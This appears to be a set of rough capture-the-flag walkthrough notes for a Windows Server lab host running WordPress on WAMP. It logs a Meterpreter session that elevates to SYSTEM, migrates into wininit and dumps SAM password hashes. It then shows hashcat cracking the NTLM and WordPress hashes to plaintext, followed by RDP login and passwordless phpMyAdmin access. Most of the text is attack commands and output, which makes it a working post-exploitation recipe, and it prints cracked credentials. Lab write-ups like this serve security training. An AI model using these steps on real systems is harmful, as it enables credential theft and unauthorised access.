Host Name: WINSERVER-01
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: EC2
Registered Organization: Amazon.com
Product ID: 00252-70000-00000-AA535
Original Install Date: 12/31/2021, 8:01:42 AM
System Boot Time: 8/17/2024, 10:37:44 AM
System Manufacturer: Xen
System Model: HVM domU
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2300 Mhz
BIOS Version: Xen 4.11.amazon, 8/24/2006
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC) Coordinated Universal Time
Total Physical Memory: 16,384 MB
Available Physical Memory: 15,387 MB
Virtual Memory: Max Size: 24,576 MB
Virtual Memory: Available: 22,080 MB
Virtual Memory: In Use: 2,496 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 220 Hotfix(s) Installed.
[01]: KB3191564
[02]: KB2894856
[03]: KB2896496
[04]: KB2919355
[05]: KB2919442
[06]: KB2934520
[07]: KB2938066
[08]: KB2938772
[09]: KB2949621
[10]: KB2954879
[11]: KB2955164
[12]: KB2959626
[13]: KB2965500
[14]: KB2967917
[15]: KB2969339
[16]: KB2971203
[17]: KB2973448
[18]: KB2975061
[19]: KB2975719
[20]: KB2977765
[21]: KB2978041
[22]: KB2978126
[23]: KB2984006
[24]: KB2989647
[25]: KB2989930
[26]: KB2993100
[27]: KB2995004
[28]: KB2995388
[29]: KB2996799
[30]: KB2998174
[31]: KB2999226
[32]: KB3000483
[33]: KB3000850
[34]: KB3004545
[35]: KB3012199
[36]: KB3012702
[37]: KB3013172
[38]: KB3013769
[39]: KB3013791
[40]: KB3013816
[41]: KB3014442
[42]: KB3019978
[43]: KB3021910
[44]: KB3022345
[45]: KB3023222
[46]: KB3023266
[47]: KB3024751
[48]: KB3024755
[49]: KB3030947
[50]: KB3032663
[51]: KB3033446
[52]: KB3035126
[53]: KB3036612
[54]: KB3037579
[55]: KB3038002
[56]: KB3038701
[57]: KB3042085
[58]: KB3044374
[59]: KB3044673
[60]: KB3045634
[61]: KB3045685
[62]: KB3045717
[63]: KB3045719
[64]: KB3045755
[65]: KB3045999
[66]: KB3046017
[67]: KB3046737
[68]: KB3054169
[69]: KB3054203
[70]: KB3054256
[71]: KB3054464
[72]: KB3055323
[73]: KB3055343
[74]: KB3055642
[75]: KB3059317
[76]: KB3060681
[77]: KB3060793
[78]: KB3061512
[79]: KB3063843
[80]: KB3064209
[81]: KB3068708
[82]: KB3071756
[83]: KB3074228
[84]: KB3074548
[85]: KB3075853
[86]: KB3077715
[87]: KB3078405
[88]: KB3078676
[89]: KB3080149
[90]: KB3082089
[91]: KB3083325
[92]: KB3083711
[93]: KB3084135
[94]: KB3084905
[95]: KB3086255
[96]: KB3087137
[97]: KB3091297
[98]: KB3094486
[99]: KB3095701
[100]: KB3097997
[101]: KB3098779
[102]: KB3099834
[103]: KB3100473
[104]: KB3102429
[105]: KB3102467
[106]: KB3102812
[107]: KB3103616
[108]: KB3103696
[109]: KB3103709
[110]: KB3109103
[111]: KB3109976
[112]: KB3110329
[113]: KB3112148
[114]: KB3112336
[115]: KB3115224
[116]: KB3118401
[117]: KB3121261
[118]: KB3122654
[119]: KB3123245
[120]: KB3126434
[121]: KB3126587
[122]: KB3127226
[123]: KB3133043
[124]: KB3133690
[125]: KB3134179
[126]: KB3134815
[127]: KB3135449
[128]: KB3137728
[129]: KB3138602
[130]: KB3138615
[131]: KB3139164
[132]: KB3139398
[133]: KB3139914
[134]: KB3140219
[135]: KB3140234
[136]: KB3141092
[137]: KB3145384
[138]: KB3145432
[139]: KB3146604
[140]: KB3146723
[141]: KB3146751
[142]: KB3147071
[143]: KB3148851
[144]: KB3155784
[145]: KB3156059
[146]: KB3156418
[147]: KB3159398
[148]: KB3161949
[149]: KB3162343
[150]: KB3162835
[151]: KB3172614
[152]: KB3172729
[153]: KB3173424
[154]: KB3175024
[155]: KB3178539
[156]: KB3179574
[157]: KB3179948
[158]: KB3186539
[159]: KB3195387
[160]: KB3210135
[161]: KB4014510
[162]: KB4024847
[163]: KB4033369
[164]: KB4033428
[165]: KB4040972
[166]: KB4041777
[167]: KB4043763
[168]: KB4054566
[169]: KB4054854
[170]: KB4054980
[171]: KB4055001
[172]: KB4056898
[173]: KB4073700
[174]: KB4096417
[175]: KB4098972
[176]: KB4338419
[177]: KB4344145
[178]: KB4457015
[179]: KB4457034
[180]: KB4459941
[181]: KB4470639
[182]: KB4480054
[183]: KB4480095
[184]: KB4483450
[185]: KB4486105
[186]: KB4486545
[187]: KB4495585
[188]: KB4504418
[189]: KB4506993
[190]: KB4506996
[191]: KB4511524
[192]: KB4512938
[193]: KB4514361
[194]: KB4515846
[195]: KB4519567
[196]: KB4521864
[197]: KB4524445
[198]: KB4532940
[199]: KB4533004
[200]: KB4534134
[201]: KB4537482
[202]: KB4540725
[203]: KB4552933
[204]: KB4562253
[205]: KB4565635
[206]: KB4566425
[207]: KB4569753
[208]: KB4576486
[209]: KB4578976
[210]: KB4585212
[211]: KB4597253
[212]: KB4601058
[213]: KB5001403
[214]: KB5001845
[215]: KB5003545
[216]: KB5004118
[217]: KB5004754
[218]: KB5006067
[219]: KB5007154
[220]: KB4503276
Network Card(s): 1 NIC(s) Installed.
[01]: AWS PV Network Device
Connection Name: Ethernet 2
DHCP Enabled: Yes
DHCP Server: 192.168.100.1
IP address(es)
[01]: 192.168.100.50
[02]: fe80::357a:c324:f4af:4fca
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
C:\Windows\system32>netusers
netusers
'netusers' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows\system32>net users
net users
User accounts for \\
-------------------------------------------------------------------------------
admin Administrator Guest
mike vince
The command completed with one or more errors.
C:\Windows\system32>exit
exit
meterpreter >
meterpreter >
meterpreter >
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pivot Manage pivot listeners
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session
ssl_verify Modify the SSL certificate verification setting
transport Manage the transport mechanisms
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_send Send keystrokes
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
meterpreter > get system
[-] Unknown command: get
meterpreter > getsystem
[-] Already running as SYSTEM
meterpreter >
meterpreter >
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
meterpreter >
meterpreter >
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Proce
ss]
4 0 System x64 0
388 748 svchost.exe x64 0 NT AUTHORITY\LOCAL SE C:\Windows\System32\s
RVICE vchost.exe
416 4 smss.exe x64 0
588 576 csrss.exe x64 0
648 748 svchost.exe x64 0 NT AUTHORITY\NETWORK C:\Windows\System32\s
SERVICE vchost.exe
652 644 csrss.exe x64 1
680 576 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\w
ininit.exe
688 644 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\w
inlogon.exe
748 680 services.exe x64 0
756 680 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\l
sass.exe
824 748 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\s
vchost.exe
856 748 svchost.exe x64 0 NT AUTHORITY\NETWORK C:\Windows\System32\s
SERVICE vchost.exe
944 688 dwm.exe x64 1 Window Manager\DWM-1 C:\Windows\System32\d
wm.exe
960 748 svchost.exe x64 0 NT AUTHORITY\LOCAL SE C:\Windows\System32\s
RVICE vchost.exe
1004 748 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\s
vchost.exe
1112 748 svchost.exe x64 0 NT AUTHORITY\LOCAL SE C:\Windows\System32\s
RVICE vchost.exe
1180 748 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\s
poolsv.exe
1220 748 amazon-ssm-ag x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amaz
ent.exe on\SSM\amazon-ssm-age
nt.exe
1304 748 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amaz
on\XenTools\LiteAgent
.exe
1324 748 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\s
vchost.exe
1368 748 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\s
vchost.exe
1460 748 httpd.exe x64 0 NT AUTHORITY\SYSTEM C:\wamp64\bin\apache\
apache2.4.51\bin\http
d.exe
1476 1220 ssm-agent-wor x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amaz
ker.exe on\SSM\ssm-agent-work
er.exe
1492 1476 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\c
onhost.exe
1548 748 mysqld.exe x64 0 NT AUTHORITY\SYSTEM C:\wamp64\bin\mariadb
\mariadb10.6.5\bin\my
sqld.exe
1616 1044 powershell.ex x86 0 NT AUTHORITY\SYSTEM C:\Windows\syswow64\W
e indowsPowerShell\v1.0
\powershell.exe
1680 748 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amaz
on\Ec2ConfigService\E
c2Config.exe
1900 1460 httpd.exe x64 0 NT AUTHORITY\SYSTEM C:\wamp64\bin\apache\
apache2.4.51\bin\http
d.exe
2148 688 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\L
ogonUI.exe
2272 2412 GoogleCrashHa x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86
ndler.exe )\Google\Update\1.3.3
6.132\GoogleCrashHand
ler.exe
2320 1616 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\c
onhost.exe
2412 2984 GoogleUpdate. x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86
exe )\Google\Update\Googl
eUpdate.exe
2464 748 svchost.exe x64 0 NT AUTHORITY\NETWORK C:\Windows\System32\s
SERVICE vchost.exe
2524 748 svchost.exe x64 0 NT AUTHORITY\NETWORK C:\Windows\System32\s
SERVICE vchost.exe
2584 748 msdtc.exe x64 0 NT AUTHORITY\NETWORK C:\Windows\System32\m
SERVICE sdtc.exe
2676 2412 GoogleCrashHa x64 0 NT AUTHORITY\SYSTEM C:\Program Files (x86
ndler64.exe )\Google\Update\1.3.3
6.132\GoogleCrashHand
ler64.exe
meterpreter > migrate 680
[*] Migrating from 1616 to 680...
[*] Migration completed successfully.
meterpreter > hashdump
admin:1011:aad3b435b51404eeaad3b435b51404ee:72f5cfa80f07819ccbcfb72feb9eb9b7:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5c4d59391f656d5958dab124ffeabc20:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
mike:1009:aad3b435b51404eeaad3b435b51404ee:c7bad7d1cc2f3c69adea5ccb429234ad:::
vince:1010:aad3b435b51404eeaad3b435b51404ee:c9b30a86acaea990bf9fa6c35ac9dd92:::
meterpreter > Interrupt: use the 'exit' command to quit
meterpreter >
Dumping Hashes and Cracking :
root@kali:~# hashcat -m 1000 -a 0 -O wordpresshashes /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 9.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================
* Device #1: pthread-Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz, 5843/5907 MB (2048 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 27
Hashes: 5 digests; 5 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Optimized-Kernel
* Zero-Byte
* Precompute-Init
* Meet-In-The-Middle
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Initializing backend runtime for device #1...
Host memory required for this attack: 64 MB
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => Dictionary cache building /usr/share/wordlists/rockyou.Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
72f5cfa80f07819ccbcfb72feb9eb9b7:superman
c7bad7d1cc2f3c69adea5ccb429234ad:diamond
c9b30a86acaea990bf9fa6c35ac9dd92:greenday
31d6cfe0d16ae931b73c59d7e0c089c0:
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: NTLM
Hash.Target......: wordpresshashes
Time.Started.....: Mon Aug 19 07:27:46 2024 (25 secs)
Time.Estimated...: Mon Aug 19 07:28:11 2024 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 573.0 kH/s (1.90ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 4/5 (80.00%) Digests
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 6538/14344385 (0.05%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[213134356173382a] -> $HEX[042a0337c2a156616d6f732103]
Started: Mon Aug 19 07:27:08 2024
Stopped: Mon Aug 19 07:28:11 2024
root@kali:~# cat wordpresshashes
admin:1011:aad3b435b51404eeaad3b435b51404ee:72f5cfa80f07819ccbcfb72feb9eb9b7:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5c4d59391f656d5958dab124ffeabc20:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
mike:1009:aad3b435b51404eeaad3b435b51404ee:c7bad7d1cc2f3c69adea5ccb429234ad:::
vince:1010:aad3b435b51404eeaad3b435b51404ee:c9b30a86acaea990bf9fa6c35ac9dd92:::
root@kali:~#
MySQL enumeration
Xfreerdp
https://www.mankier.com/1/xfreerdp
xfreerdp /u:admin /p:superman /v:192.168.100.50 /f Wordpress Admin hash file cracking:
navigate to this path as shown in the below picture
signin using the above creds
open chrome and http://127.0.0.1 and click on phpmyadmin
navigate to 127.0.0.1/phpmyadmin4.9.7
username: root
password : empty password
db : maria db
root@kali:~#
root@kali:~#
root@kali:~# hashcat -m 400 -a 0 -o output.txt maria /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 9.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================
* Device #1: pthread-Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz, 5843/5907 MB (2048 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 64 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Session..........: hashcat
Status...........: Cracked
Hash.Name........: phpass
Hash.Target......: $P$B.1p.5fiYdFnwttTzSkvT2sl01rlOj0
Time.Started.....: Mon Aug 19 07:38:44 2024 (1 sec)
Time.Estimated...: Mon Aug 19 07:38:45 2024 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 154 H/s (8.70ms) @ Accel:32 Loops:1024 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 128/14344385 (0.00%)
Rejected.........: 0/128 (0.00%)
Restore.Point....: 64/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:7168-8192
Candidates.#1....: samantha -> diamond
Started: Mon Aug 19 07:38:10 2024
Stopped: Mon Aug 19 07:38:45 2024
root@kali:~# cat output.txt
$P$B.1p.5fiYdFnwttTzSkvT2sl01rlOj0:estrella
root@kali:~#
now that we have password for the wordpress we can now signin using the creds
http://wordpress.local/wp-login or http://127.0.0.1/wp-login
username : admin
password: estrella
Admin Flag
da5323e3f2534e4e9e47018d91df67b3
Mike flag
4194a63bdbc04716a2d8d4e3343b1b3a
Last updated